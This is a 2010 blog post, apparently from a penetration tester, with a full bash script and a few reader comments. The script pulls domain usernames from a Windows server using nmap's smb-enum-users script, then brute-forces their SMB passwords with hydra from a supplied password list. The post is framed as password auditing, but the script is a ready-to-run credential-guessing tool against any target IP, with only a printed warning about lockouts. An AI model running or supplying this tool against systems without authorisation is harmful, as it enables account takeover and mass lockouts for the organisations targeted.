Sunday, 26 September 2010

Fast password auditing with nmap and hydra

I have been spending a lot of time with some of the nmap scripts recently, particularly the smb-brute and enum-users scripts. These work fine but I wanted to be able to have my own custom password list which I could fine-tune according to the target company, and also to the UK (i.e. to include football teams, companyname123, etc).

The smb-enum-users script is the best way I've found to pull usernames from a domain controller, so this is a good place to start. However, the output requires a bit of cleaning before I can use it for piping into hydra. Yes, smb-brute will do most of this, but I wanted to have a bit more control on things.

After a few hours spent learning the grep, cut and sed commands, I finally managed to produce a fairly clean user list, without all the computer accounts and other characters that I didn't require. This is then piped into hydra with the correct parameters to produce a nice output of cracked accounts. A few lines later and it becomes a simple yet effective program with which to quickly audit domain accounts.

I am new to shell scripting, so I'm betting this could be done in a much better way. Anyway, let me know if you find it as useful as I do.

*********************************************************************************
#!/bin/bash
echo
echo "*******************************************************"
echo "*                                                     *"
echo "*  Welcome to the Domain Account Bruteforce Tool.     *"
echo "*             By Sean gambles 21st Sep 2010           *"
echo "*******************************************************"
echo
echo "This tool makes use of the nmap smb-enum-users script,"
echo "by basically exporting the results, in a cleaned up form"
echo "into hydra for bruteforcing."
echo
echo "Currently, only working with server 2000, 2003 family."
echo "This is due to server 2008 not allowing unauthenticated"
echo "account enumeration."
echo
echo "*** Please observe account lockout thresholds before"
echo "submitting your password file into this tool, as there"
echo "is no protection against lockouts taking place. ***"
echo
read -p "Please enter the target server IP :" target
echo
echo "Please enter the path to your password file"
read -p "E.g /root/passwords.txt :" passfile
echo
echo "Enumerating users, please wait...."
nmap -p139,445 -n $target --script=smb-enum-users |grep Users |cut -d":" -f3 |tr "," "\n" |tr -d "^ " |grep -v
\\"$" >/tmp/users.txt
echo "The following accounts have been found:"
echo
cat /tmp/users.txt
echo
read -p "Press enter to start cracking the accounts."
echo
echo "Trying passwords against all the user accounts, please wait...."
hydra $target smbnt -s445 -L /tmp/users.txt -P $passfile -t1 -e n -m D >/tmp/results.txt
rm /tmp/users.txt
echo "*********************************************************"
echo
echo "Domain accounts found :"
echo
cat /tmp/results.txt |grep login |cut -d" " -f6-11
rm /tmp/results.txt

4 comments:

  1. Awesome. I hope you'll publish an update on this.

    ReplyDelete
  2. kind of forgot about this script, the nmap script output has been changed since I originally wrote this, which is why it wouldn't work.
    I have updated it, and it should be ok again now :0)

    ReplyDelete
  3. Great article, you really are the Lord of the Hackers

    ReplyDelete
  4. King would of done but thanks

    ReplyDelete